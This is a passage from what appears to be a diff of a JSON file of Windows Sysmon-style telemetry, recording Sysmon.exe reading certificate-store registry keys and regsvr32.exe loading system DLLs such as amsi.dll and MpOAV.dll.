"C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573240890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - 
"registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573240890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573240890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573240890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573240890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573240890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": 
"Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573240890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573240890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573240890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573240890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573240890000, - 
"unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573240890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "amsi.dll", - "image_path": "C:\\Windows\\System32\\amsi.dll", - "pid": 2012, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\System32\\regsvr32.exe", - "timestamp": 131883573240270000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573240890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2012, - "process_name": "regsvr32.exe", - "process_path": "C:\\WINDOWS\\system32\\regsvr32.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SyncRootManager", - "registry_value": "SyncRootManager", - "timestamp": 131883573240890000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" - }, - { - "event_type": "image_load", - "image_name": "edputil.dll", - "image_path": "C:\\Windows\\System32\\edputil.dll", - "pid": 2012, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\System32\\regsvr32.exe", - "timestamp": 
131883573240890000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" - }, - { - "event_type": "image_load", - "image_name": "Windows.StateRepositoryPS.dll", - "image_path": "C:\\Windows\\System32\\Windows.StateRepositoryPS.dll", - "pid": 2012, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\System32\\regsvr32.exe", - "timestamp": 131883573240890000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573241050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573241050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573241050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": 
"HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573241050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573241050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573241050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573241050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573241050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - 
"event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573241050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573241050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573241050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573241050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - 
"timestamp": 131883573241050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573241050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573241050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573241050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573241050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": 
"HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573241050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573241050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573241050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573241050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573241050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": 
"registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573241050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "MpOAV.dll", - "image_path": "C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\4.18.1810.5-0\\MpOAV.dll", - "pid": 2012, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\System32\\regsvr32.exe", - "timestamp": 131883573240430000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" - }, - { - "event_type": "image_load", - "image_name": "cldapi.dll", - "image_path": "C:\\Windows\\System32\\cldapi.dll", - "pid": 2012, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\System32\\regsvr32.exe", - "timestamp": 131883573241050000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573241050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - 
"timestamp": 131883573241050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "WinTypes.dll", - "image_path": "C:\\Windows\\System32\\WinTypes.dll", - "pid": 2012, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\System32\\regsvr32.exe", - "timestamp": 131883573241050000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573241050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573241050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573241050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": 
"HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573241050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573241050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573241050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573241050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573241050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - 
"event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573241050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573241050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573241050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573241050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", 
- "registry_value": "Certificates", - "timestamp": 131883573241050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573241050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573241050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573241050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573241050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": 
"HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573241050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573241200016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573241200016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": 